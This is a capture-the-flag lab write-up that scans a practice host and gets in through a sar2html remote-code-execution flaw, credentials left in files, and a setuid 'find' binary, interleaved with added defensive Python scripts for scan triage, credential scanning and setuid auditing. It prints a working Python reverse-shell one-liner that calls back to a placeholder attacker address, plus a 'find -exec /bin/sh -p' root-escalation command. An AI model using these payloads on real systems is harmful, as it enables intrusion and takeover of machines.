Nmap results:
# Nmap 7.92 scan initiated Sun Oct 9 21:08:41 2022 as: nmap -sC -sV -A -p- -oA nmap_all_ports 10.10.132.247
Nmap scan report for 10.10.132.247
Host is up (0.092s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.6.59.31
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 9 21:27:25 2022 -- 1 IP address (1 host up) scanned in 1123.63 seconds
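The scan output above is Nmap's normal format (what -oA writes to the .nmap file). As an added example that is not part of the original writeup, the following Python parser reads that format and pulls out what a defender would triage from exactly this scan: anonymous FTP, clear-text FTP, an exposed Webmin instance, and SSH on a non-standard port. The sample text is a trimmed copy of the port and script lines shown above; the finding messages are this example's own wording.

```python
import re

# Constructed sample: the port lines and NSE script output from the scan above,
# trimmed to what the parser needs (Nmap normal output, as written by -oA/-oN).
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| Control connection is plain text
| Data connections will be plain text
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
"""

# One port line: "<port>/<proto> <state> <service> [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(text):
    """Return a list of dicts, one per port line, with its NSE script lines attached."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": [],
            }
            services.append(current)
        elif line.startswith("|") and current is not None:
            # Script output lines start with "| " or "|_"; strip that prefix.
            current["scripts"].append(line.lstrip("|_ ").strip())
    return services


def open_ports(services):
    return [s["port"] for s in services if s["state"] == "open"]


def triage(services):
    """Flag the findings a defender would want to act on from this scan."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        script_text = " ".join(s["scripts"]).lower()
        version = s["version"].lower()
        if s["service"] == "ftp" and "anonymous ftp login allowed" in script_text:
            findings.append((s["port"], "anonymous FTP login enabled"))
        if s["service"] == "ftp" and "plain text" in script_text:
            findings.append((s["port"], "FTP without TLS: credentials cross the wire in clear"))
        if "webmin" in version:
            findings.append((s["port"], "Webmin admin interface reachable from the scanning host"))
        if s["service"] == "ssh" and s["port"] != 22:
            findings.append((s["port"], "SSH on a non-standard port; a full-port scan still finds it"))
    return findings


if __name__ == "__main__":
    svcs = parse_services(SAMPLE_NMAP)
    print("open ports:", open_ports(svcs))
    for port, msg in triage(svcs):
        print(f"  {port}: {msg}")
```

Running this over the real .nmap file instead of the sample (read the file and pass its contents to parse_services) gives the same four findings for this host; the non-standard SSH port is reported as an inventory item, not a control, because the -p- scan found it anyway.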
As you can see, port 80 is serving HTTP.
So we launch Feroxbuster to look for any potential directories:
feroxbuster --url http://10.10.132.247/ | tee feroxbuster.log
After a while, we see that _test is a valid directory.
http://10.10.132.247/joomla/_test/index.php
Visiting the URL greets us with sar2html, which is vulnerable to RCE (Remote Code Execution).
We can now start a netcat listener on our attacking machine and execute our payload through the sar2html index page.
Attacking Machine:
nc -lnvp 1234
Victim machine (Python reverse shell):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_Address",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Note: make sure to change "IP_Address" to your attacking machine's IP. Also, the output of commands run on the victim is printed under the OS > Linux > Select Host drop-down menu.
After a successful shell, we are the www-data user under /var/www/html/joomla/_test. Listing the directory shows a Log.txt file containing SSH credentials for the user basterd.
Now let's try to SSH to localhost using those credentials.
Alright, we have the user basterd, and our present working directory is now /home/basterd. This directory contains a backup.sh script. Whoops, this script contains credentials for the user stoner.
It seems that the password line has been commented out with "#". So we copy the whole line except the hash symbol and SSH to localhost as user stoner.
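Both footholds so far came from credentials left in files (Log.txt, then backup.sh), and commenting a password out does not remove it from a world-readable script. As an added example that is not part of the original writeup, the following Python scanner walks text files and reports credential-like assignments whether or not the line is commented out, so that a review catches them before an attacker does. The sample script, the variable names and the value in it are constructed for this example and are not the box's real contents.

```python
import re

# Constructed sample resembling the backup script described above: a credential
# assignment that was "removed" by commenting it out. The value is made up.
SAMPLE_SCRIPT = """\
#!/bin/bash
# nightly backup of the web root
SRC=/var/www/html
DEST=/backup
#PASSWORD=example-only-not-real
tar czf "$DEST/www.tgz" "$SRC"
"""

# Matches NAME=value or NAME: value where NAME looks credential-like, with or
# without a leading "#". Name-based matching has false positives (e.g. COMPASS=),
# so treat hits as review items, not verdicts.
CRED_RE = re.compile(
    r"^\s*(#\s*)?(?:export\s+)?"
    r"([A-Za-z0-9_]*(?:pass(?:word|wd)?|pwd|secret|token|api_?key)[A-Za-z0-9_]*)"
    r"\s*[=:]\s*['\"]?([^'\"\s#]+)",
    re.IGNORECASE,
)


def find_credentials(text):
    """Return one dict per suspicious line; the secret itself is masked."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CRED_RE.match(line)
        if not m:
            continue
        value = m.group(3)
        hits.append({
            "line": lineno,
            "name": m.group(2),
            "commented": m.group(1) is not None,
            # Never log the secret itself; keep just enough to confirm the match.
            "masked": value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**",
        })
    return hits


def scan_file(path):
    """Scan a file on disk (scripts, logs, config) with the same rules."""
    with open(path, "r", errors="replace") as fh:
        return find_credentials(fh.read())


if __name__ == "__main__":
    for h in find_credentials(SAMPLE_SCRIPT):
        state = "commented out" if h["commented"] else "live"
        print(f"line {h['line']}: {h['name']} ({state}) = {h['masked']}")
```

The fix for a hit is to move the secret out of the file (an environment file or a secret store with restrictive permissions) and rotate it; a commented-out password is still a valid password until it is changed.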
Hey, we have stoner. “.secret” is the user flag.
Okay, now we start escalating our privileges to get root.
Searching for programs with the SUID bit set, we find the program "find".
find / -perm -u=s -type f 2>/dev/null
We can now simply make find execute /bin/sh for us, as below:
find . -exec /bin/sh -p \; -quit
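The root step works only because a general-purpose program (find) was left setuid. As an added example that is not part of the original writeup, the following Python audit walks the filesystem like the find command above, but from the defender's side: it classifies each setuid file as expected, never-setuid, or needing review, and diffs the result against a baseline snapshot so a newly added setuid binary stands out. The EXPECTED_SUID list is an assumption for a stock Ubuntu host and should be built from a known-good system; NEVER_SUID holds only find, the binary this writeup used.

```python
import os
import stat

# Setuid binaries that ship setuid on a stock Ubuntu install. Assumption for this
# example; generate the real list from a freshly installed, known-good host.
EXPECTED_SUID = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
    "mount", "umount", "ping", "pkexec", "fusermount",
}

# Binaries that must never be setuid because they can run arbitrary commands.
# find is the one the writeup used; extend from your own review.
NEVER_SUID = {"find"}


def classify(path, mode):
    """Return None for non-setuid files, otherwise a verdict string."""
    if not (mode & stat.S_ISUID):
        return None
    name = os.path.basename(path)
    if name in NEVER_SUID:
        return "never-setuid"
    if name in EXPECTED_SUID:
        return "expected"
    return "review"


def audit(entries):
    """entries: iterable of (path, st_mode). Returns {path: verdict} for setuid files."""
    results = {}
    for path, mode in entries:
        verdict = classify(path, mode)
        if verdict is not None:
            results[path] = verdict
    return results


def walk_filesystem(root="/"):
    """Yield (path, st_mode) for every regular file under root, skipping unreadable dirs."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


def diff_against_baseline(current, baseline):
    """Setuid paths added since the baseline snapshot, and paths that dropped out of it."""
    return sorted(set(current) - set(baseline)), sorted(set(baseline) - set(current))


if __name__ == "__main__":
    for path, verdict in sorted(audit(walk_filesystem("/")).items()):
        print(f"{verdict:13} {path}")
```

Run it from a scheduled job, store the {path: verdict} output as the baseline, and alert on anything diff_against_baseline reports as added; on this box the remediation is to drop the setuid bit from find, since nothing in a normal workflow needs it.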
We have all we need.